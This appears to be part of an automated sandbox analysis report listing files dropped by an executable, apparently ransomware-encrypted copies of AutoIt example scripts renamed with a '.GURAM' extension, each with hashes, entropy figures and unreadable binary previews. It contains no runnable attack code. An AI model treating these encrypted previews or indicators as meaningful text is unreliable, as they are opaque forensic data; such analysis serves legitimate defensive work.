                                                                                                                                                                                                                                                Preview:[..[prv....J.u}...n.:.<.Q.>.<...aPz.6..........f...........o..h..u.&..R.XZ<O...:v.];.'.Q>:.).x6.<..5G.:.......)..b.. ....6..@..m.'.TC|.n.]+.*:...n..I.M.z...7..J..Q..`.A.L3g.zc\Sg-)..:....V.....y0....MNFK...O9..p...q...*A...>y...J..}.R......h...9.+B..AF..?..0.W..\..8...H.eG..J..h..F_L0.>{I,...*l.d..C[7..hk....(.;.&..M;.HGB`..X\`D.....T..D..(...GG.9a...C.Q..si..|8..j/.M35..\..B6..sk].[..#S....I<+...".S.)G..VjU..Q..........Xw...8...6.,.a....P.M.35#"r.9...t..3..qG...S.p^u..w'n..f...Zw.((...hX.......... [...w._S..]\X.M......{9i.@z1..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N..

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArraySearch[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1500
                                                                                                                                                                                                                                                Entropy (8bit):7.859252373697504
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:UoqcypkNqdBDigmQUUjn/fdK4oq6fqLGA2ssb1XPL3edujmJrc0YXUZtwsTy2DhT:UoqVpksddhHTdKAFLo1redg4o0jZtwhC
                                                                                                                                                                                                                                                MD5:153E6A05E48044E78C149148CC580534
                                                                                                                                                                                                                                                SHA1:8F33434FE3A357862AD669F592291397BD4E72DF
                                                                                                                                                                                                                                                SHA-256:2F7E4029DDAEC4B2AFFCE66007EF9E584F5158DF3F56DF4A659B6C3D161D4E98
                                                                                                                                                                                                                                                SHA-512:A9E479260CA6FF9DD92B847CE63C0F4BABCDE296DD9BCBC1B5D90CCECD1D10224501E26DFDFB3542E21D8350469D20A64CC9F0F9C0CB0ED9961729821976C804
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:P.T.pG.3F.:I.......;*F....p.e..-v..j.....bo.F......M..L..'...L.....Z....5.zs*...#.g..D..Z..X`S._>u.0...$h.....fOb@K.LMJ..ax...t....IM`....g.....f...<..4.........u..z.O=nfI.B.....8...B..!q...uV[.%..@...4..'...P.3T.........v....T.7I.0.....O..%..8f].Gg...k....c..p........]n....p.Hm6.......R%...i.........p.g...t......c...G...q.yQ...M.x#u..G.S.n..m.^L"....u..a.\...@X..B.I.!-F..<..Hv~..lT.$.uvMW.H.X........y.c......\Y..O.w......i3oFv.H....5.)...h<..]-....qx).C..P4.9../..<...m3C.Wp$..I<..L(Q.6w.#.(7.O.,..ppYb.{..ol.......d..P.."..u...gm].\\D.$. .D.......]...|...o$.F.E..R.....A.....&..}.....%.d..5...D.K|0q.)z.<hr.....=.&.....V./]...+..f$..x...@..>u....G...L..e<..{...~..3....!.o..:Xg.(.>OO....g3.m@....(..c. \.....c.. ....k.8.l2...Yk..G>..=.se-..Q(.......d.d..g.v)&.V..@F..!....)^...v.fr........@.MN&..Y#g...h...V......U..v.....W0..L.v..To..C....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayShuffle.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1376
                                                                                                                                                                                                                                                Entropy (8bit):7.851110660306149
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:cqcRACUie4zCKTYRbvjbQZ/0MRBN8jSU0heMIRCjmJrc0YXUZtwsTC/0Dzk:cjRArbpRbvjcZ/0MfN8epIW4o0jZtw5Z
                                                                                                                                                                                                                                                MD5:8D4A5854153D96ACB568E0FF65EEFF0D
                                                                                                                                                                                                                                                SHA1:3F8FC3173A4A4C8F9A7C9F667D65DDCA850BC6A3
                                                                                                                                                                                                                                                SHA-256:511133D6823F30A7F878ADE9AC8DFE3D01263260F2FC1BDE2BE8C53B1F1E6779
                                                                                                                                                                                                                                                SHA-512:48DEA00482B734830BB6C1EB346959A17F4DAD7AC70316B882A30A47DFA13E51BD5E2BEA6A7CBD55A27341523C8F8211DB8CC0E673D4B230C8F3E38FAB518D6C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:v.!%.'[....X8....n..Zq@.....F?.5....4!mQ...........R..*....'....2.t....BwI!..].Y..Y.L..fV.HG.IAu..S...V.e<lw].D..|.g.^..*]D3.6..&....?...L...H.n...Ha..;.S-..._un.2.....A4......K`...|.Hd.I"......F.nm....)yP..C..O....j{..+...x.l...3...h.\T.=/s(..w..M.T.....i....7...r....I...7?0./...w0..cIAkt....*2....j.9....>....m.T?.1\,.r......2Q....i...m.b..8h.).....n.....O...+....$.#).@+i.G..z.,K.....j.=<.a....kp....t........2.gw.Q...@.Ea.\6M-.T..>~...E...}H..w..P.....%.5.7.LlVz.9z9...`=UUq.]~C.M.K}Hzl1....$..h..(..U.pE.......xB;.8.yI5...\..g....2..}.C.Y@..... .T@.f.cxtJ..j{.... ..6PR. R.A....5 _...~.p..<........<....o..v.qG.$...qVp~.I..-.u.uTL......@.J..JY../d:.A-?$.D_N.(..d.2..ibp..~.Hz..*.d..C.t.`.W..E."T.9y..."*~...8...I).M..\.h..H.BY.......>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N..

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArraySort.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1101
                                                                                                                                                                                                                                                Entropy (8bit):7.801114451928345
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:pTRWleA8ogp73OCMnkx5L3AbHjmJrc0YXUZtwsTq4:pTRwbgRMnc3aD4o0jZtwK
                                                                                                                                                                                                                                                MD5:7C522C951F4C4B72C971F8625F30C908
                                                                                                                                                                                                                                                SHA1:55800375DC3AF800E99DB3A3AF93E2CBF4DDC2B3
                                                                                                                                                                                                                                                SHA-256:17677AF1DE23FC1204D359E9A4A5ED803921A56EFC3C97489B4C9B1215266C0B
                                                                                                                                                                                                                                                SHA-512:443B556A41C1BB50E78E09D89DCBA7355E400130759A7A8CF3D0415AD21CC30FB5AEFD2FFCE275EF9EFEBDD35988F6E0829ADD717801804B3848FA85A374096F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....{=J.e.u.yS(..B..4.?j.{.kj].>..-.v.y5..s.i...v=m^..nA..#0..iv~V....-/....c.g...u..y..w..w...iq9...{WPW.......C......B.$....Q.*.=.n.&.|.....Q.A.M...L..n..D..w#..if.zT.*..N..d.D..s.6.o.B.....E...p.......b/..:'.%8...].W\'....I.7.X.X"..x.n..tqvx.u..f^T......r.....n.hg..T.._..(..V.-l.....%.... ..m,,....\c.P.\y.VS{......t',Y.4.T.u`gB.#.......v.S...d...3.gu`H.................Y(..Zj.j...b...7.sWX.....^..0.F~..`=..z:.Q.......>..{.Q.N.'..$h.2D$0j........<...6...\...xh...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&.

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArraySort[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1151
                                                                                                                                                                                                                                                Entropy (8bit):7.7970944802079565
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:wwd+X4q0rLf9uiAhn2gjmJrc0YXUZtwsTWjvbfs:wRX4q0vHAhJ4o0jZtwxzs
                                                                                                                                                                                                                                                MD5:F4B9DC8CAA75EEB854414222ED2581F6
                                                                                                                                                                                                                                                SHA1:664B0B2BDE23FAF15BE4758122A909DDF5995B05
                                                                                                                                                                                                                                                SHA-256:F13488CCB2DC5FEBD32288F5720CC4A6582F07BB8EF771E8B222DFBB01EB7E2A
                                                                                                                                                                                                                                                SHA-512:8A09B904A04D9FA06F16AEFCE331787890584DAE70F5010BFE906B027C616B4227B6D561558341C371FCD73D2DB14B23F9B604ED684A34A65437955638230AD3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.09.h..D.>..e..H..D..9g..f-\...VY8.$..1...Q...4..xN..VF....tf..h|V~.me......7 ."....e@.@..z\..'......]~.4..|f>.b..xKW...!..>.L.....c.._M./=.t...M...?U(ef.............H{k....0.x...G....?....L...R8.2.4.A....p.........$1...k...>./.~...j.D.v.D...B.....u^....2..".k.....9_[....A1..s&..i......!...B.,na?..c.:..{.y6.uA5s~.G..(.j...{..0.V&..A.=.T:.-...P...m...............3]4.c[.g.."G.E.......O..T ..9.(..Ry7n.....J.q...("T.......5.N=.......b7......a..:.s!A..xrCQ...[k1.RPTP`4....y...._......9.y..Pv../.p{.=6...o.+."..{y=..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArraySwap.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1535
                                                                                                                                                                                                                                                Entropy (8bit):7.857333033166618
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:vIMrw1J4Sq6Q3VQXIdWvDVo3Ut9m5VzNu2v85jmJrc0YXUZtwsTef:vIMedQCsW7C3sATvU4o0jZtwDf
                                                                                                                                                                                                                                                MD5:6FC9505837A7FEB03392C6E35131447C
                                                                                                                                                                                                                                                SHA1:6CB6A776327CF87A9EC721110AC16790454EBCB2
                                                                                                                                                                                                                                                SHA-256:1F04051F6C11A9B421011E65B1DD040717996C4E299CF94CC435667695744281
                                                                                                                                                                                                                                                SHA-512:21BF791012B529404E9EF9C40A314D5C57D56D50042972EBA0D683E720C88EB454ED33D2F13B1F3FFE23624B47546877E4DEC2FD5876DA75DF180BEA79AB6B5C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:F.]..z../..=.zT...\....i...T.......4.y.+....5.....1.Q.W.l..Fn.......M..^.....y..)]....V. .Z......OJ..N....Z....q-....Wu..Y.Rp..*..h~EdP...o...!.......0..%N.m..-?.....L.L.)...;....}.|..#ZY...?D.P......h.....!....U....B....?.. .h.J.i..z...@....s.8r......l........|..+../_.[..?...O.%.oj.,L1.....y..i...........*H.H...F...%...[l...i.Q.._t!...t....~.Na......<.EEp..."<Rf.q..,.%.-...k.Tnx`..I.a<..0.n...+*J.6...;.]*o.+...Ij....D.f...d....B`.....4....k..1{..?..5.Y.a..............?.]Hv._z..{.%Jk....e........|?....Q.....h .".;:....M..".-.........3x...x......_v.j..Q......';........y..J0E4$.......b1D.:`.<..:...#..x<.-.YJ.....V...I....#f..Tk.T.{..e..:..yLdi...}...Ht9.5..jp,y.}.g..owV)]Ci.E..T....%..<. ....M..V..."...}.`......|.h^..o.(f..T..c..#.......U ..h.K....T_B@.......;......9........@.(...~ ........WY.....&.20........w.. ..d...$....E.......Qg'....n..p ....c.n..CL....Z.+W&.....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayToClip.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1103
                                                                                                                                                                                                                                                Entropy (8bit):7.80495342936955
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:fs8lBMToBzl0hohX5M6Yu2afojmJrc0YXUZtwsTTve:fsItBzi6NvZf24o0jZtwWe
                                                                                                                                                                                                                                                MD5:57D3F8CEFEEC6B88613313BF9D4E246D
                                                                                                                                                                                                                                                SHA1:1475B440FA29ECABC18111D0595306B8A4F1CF39
                                                                                                                                                                                                                                                SHA-256:A67711A32DB1CD54E1965A9DC69335E23535339F671F58685840A083E72A8247
                                                                                                                                                                                                                                                SHA-512:3A7001EF4A8154A1DAFB4BC1B16749FF9E6B28FC039A1D20C513DE93326FD04F4A86E703E9BF0FF65DB7D539269C5D9932E636B16DA1497546D30A243B27EA6A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:(.@G.0`$.7l!.'7PA.g<...].h.....&.0...K...a.............5%r8.`.........6..Y..A..e.S(.wo.m..G.@.|.$.Ky.O.....'`{..%@........._.....!3....$.}.}........e..X.*..!=....#|...Y..n....8...>..e.!.%.>..R8+...."@.*.....>..|..+.n....Q..dQ.f[...K..TgV.*.V.....]i.bP.rO.X.~]..n..'........Q]q..>K.M......B..&n..u.......3.Dy....2.;#_=.>.| .qj ...M.93.17I.,.....@u........x.....^........C....lAw$._3w...i8..xg....W..2_.3..sY).......sp.. ..y......b....R......L<..rgE..(..G0W....-n.Q....M.6ZS..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayToString.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1081
                                                                                                                                                                                                                                                Entropy (8bit):7.794860901074694
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:KE1cyPgV01WeqXxN2DXt0ljmJrc0YXUZtwsTbSfmF:D1cd1hD2DyN4o0jZtwasmF
                                                                                                                                                                                                                                                MD5:0D42BB0A18D4079EC155ADEEE466A187
                                                                                                                                                                                                                                                SHA1:7082BCA46DBBDBD7878129E1C9714DAB4D4427B4
                                                                                                                                                                                                                                                SHA-256:507CEA563A0D0A345ED2B155162FD040029AFCBBF4E2E5413EE551683DE885D0
                                                                                                                                                                                                                                                SHA-512:34D5644C295A51C15F190D312D0B80AE91146518535FA56164C3837BF03A6A4C09B7573B5B322A06FC2EF197A7E2FF3625EC336574A34E070534681E02F62BDE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..KL.(..M`..fkU.-..7K. ....u.....l...j....u.-......_Y....dz.v.&w./:O.].jZ.....X..P0..LfC........,...._".. iA.....>.?.!0..xq{.d.yHy].j....k{O...v..r.._.....}..Yv.S.....t.O?.e..Bw..*.....*aT.P;0......r:~..n.oz..@o..\,...").?.g=.6..D.,.1....B./ZiE.,...ol..cD..5.`|b...G.....I..P.......3.h..V>.O..:..9.{.....j,../l...{.....Q...{...&.7N.h.zLs.q......>....w.0...x.%at..2%R^.\.J..L.k...f.pKMw..8....t`O.......:.%`..}...g*...e...~a.&..4.)1.......g.Pb/...i.og.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayTranspose.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1248
                                                                                                                                                                                                                                                Entropy (8bit):7.817221028534489
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:UFXRpgEuocX17+bG98vSYjmJrc0YXUZtwsTKBbAa:UFXRhuocX17+bZam4o0jZtw/xAa
                                                                                                                                                                                                                                                MD5:46FB2AF42D998F11C7AA7B217F0B1EA4
                                                                                                                                                                                                                                                SHA1:A94CE2288435DA5416075C7ED79BFFF8D1BB213E
                                                                                                                                                                                                                                                SHA-256:E4A5FE4874D3E2BB9EC37B2710F15FE02710FCAC6FFE3770D34B79146F43C7C5
                                                                                                                                                                                                                                                SHA-512:877F8EDB3686EE659C1A1DB871CEE1054DA0D5E3B93727A12B1D9845D2DF7613E32DDA1E534E5F2401F96AF738CB839714CBDD1DD838BA3D54148BCEC542A59E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.x.J......./\..".8v...Zg-..D......s.`4.L..%..I..o.W.6v.RN.B.y..uX....1.G.....0...gG..<_.....J9..`. .BTN...i.9.....Y...I.....O.e07J.#..l..S-....O....(......~.....ff.....8..>..+..(..%..^....p.=......~....L&.]..)...|.Zs|..H.x.N..1.8..+.........j\.m..."v..6..j...Y..>.......`SE,.d.m..\...h.9.\s..v.......`..Zdp...#...=..hRv..~.7.._MD.Bo.8.....}...r...,..........l......t...F.%$'q...Q..['.a..z..D...s.a...."....O1.;y9..2gK....).+..)....//...}.WNXl.0.Q.e6|/X..!.......%5..;&.......D.....=;2....,..1..C.(g..{....f.8.q..w.5i..:...|......)..b...&.?..X...]>}.,.@T. ...'.)..&x!...#Qu\...@Ng..J)...=..1..*... <RL...p0...VW...n.$.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayTrim.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1117
                                                                                                                                                                                                                                                Entropy (8bit):7.80636784251407
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:t1uwBmtaWJzSA6Cvs+7+scjmJrc0YXUZtwsTp:t3BmtvzSfX+7+si4o0jZtwG
                                                                                                                                                                                                                                                MD5:290C0FCBC990373A8FD036211BB2442D
                                                                                                                                                                                                                                                SHA1:50BCD936D4409D81F68297B683BFBA429128263C
                                                                                                                                                                                                                                                SHA-256:1FE254AF06CC68C33DEC86F0317EF58A68A88B360880D159545058C8FECD6E96
                                                                                                                                                                                                                                                SHA-512:9144F60B11CE2639C38D9C5F2C46B845AEE54AFC252B77558BCC83C4594BEBA6127ED4908A5166B0EC297118E1A525E0FC5427DF6A31AAC7E7186D1360801188
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.S.b.I.>.d.&...O.qV..[tET.p..ou.b.H9K.:l.g...hK...T.....N...v..uNL7.Ao.{......L.\:.x...1..L..+.VR...B..e......b/..X.2.oU.{F.......>....pR..[s........z......A...c1.N.`%i..UR.-..>".{wo:7OP.'H..I.4.z..o.q.B-.... ....&...8$5..;.I3..)B....UQ#0.ia.AT...M.2>.....).....S........u.....m..w..%.2,..d....5.~..S2.x?o.L~...x.5qg..1.....SN..7K...TI.....2.y....A..O...._.m....9........2q......H!....X....#..U3.....t......%D..%b59y...Bq.=]...)I..$ F&+.....jl.X9.f3...\I..a..".k.HI.I..(j...>{.^.<.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#j

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayUnique.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):993
                                                                                                                                                                                                                                                Entropy (8bit):7.776916246887058
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:/5dOrHp3K9bC+sTZaYjmJrc0YXUZtwsTe6:/jEVK1DsTZam4o0jZtwZ6
                                                                                                                                                                                                                                                MD5:447A8EC9DCA5DA5B1370B887014215ED
                                                                                                                                                                                                                                                SHA1:CAB1EFB492DE02746622F7FA1D04EEB6C37FC64D
                                                                                                                                                                                                                                                SHA-256:A9D5648B950161542CDBA22949C73FB1F63B79D65FC2C23454CFB25C292BB608
                                                                                                                                                                                                                                                SHA-512:38EDB20F9A1C8849778833994FFF919AB22FD429C00CFDBE3437F4260991CE074ED2C8C1677D2323E9DE6D4E2BF666F02E19B1CED788127917361553DA435D3E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.. ..,.juYCzki.:..{.......2.....&m.........F.Gk...Xp.?w..?U..6......[.8...F.....U.0....t..K2.A..V3.b8<d7C.U.)... u......s.g.N..w.~I.,.....6.....ri..Ki.....K...e~..d.b.{2..F..0.S.].Xx...;{...E..I`..d..W.!$....&...F..s.D.8...h$.7m..7-..F.........$...6......=...d...Q'......F..w.O3.c....?p..:.H-.....J...V.n..|.Z.;.q."x!...M.|.......^....-..i._....L..N...+E.*.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.......}7....TH..cNV..$.`.e7M;....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\_ArrayUnique[2].au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1152
                                                                                                                                                                                                                                                Entropy (8bit):7.839286546983755
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:Eh70Zk4Z3wQC1LHRrFwjmJrc0YXUZtwsT+8nC:maJv67RrF+4o0jZtwR
                                                                                                                                                                                                                                                MD5:BCC858F937BAEFEBB4784D8AD460EFE9
                                                                                                                                                                                                                                                SHA1:3E630698DA86D8390F357D3D66A387138E799907
                                                                                                                                                                                                                                                SHA-256:B8A7C5C0260189F2D5F466218D3AC3E6F96BECD9FDCAD9845A46C5D7034E84BF
                                                                                                                                                                                                                                                SHA-512:68FAEE11C639F225DBA76D84DD50CC6977993666893FFAB392686BE5A4D8D9B3FD1382480245A7F1175025A1B5E580F6C0892BC68617F75395E7A1805D709940
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
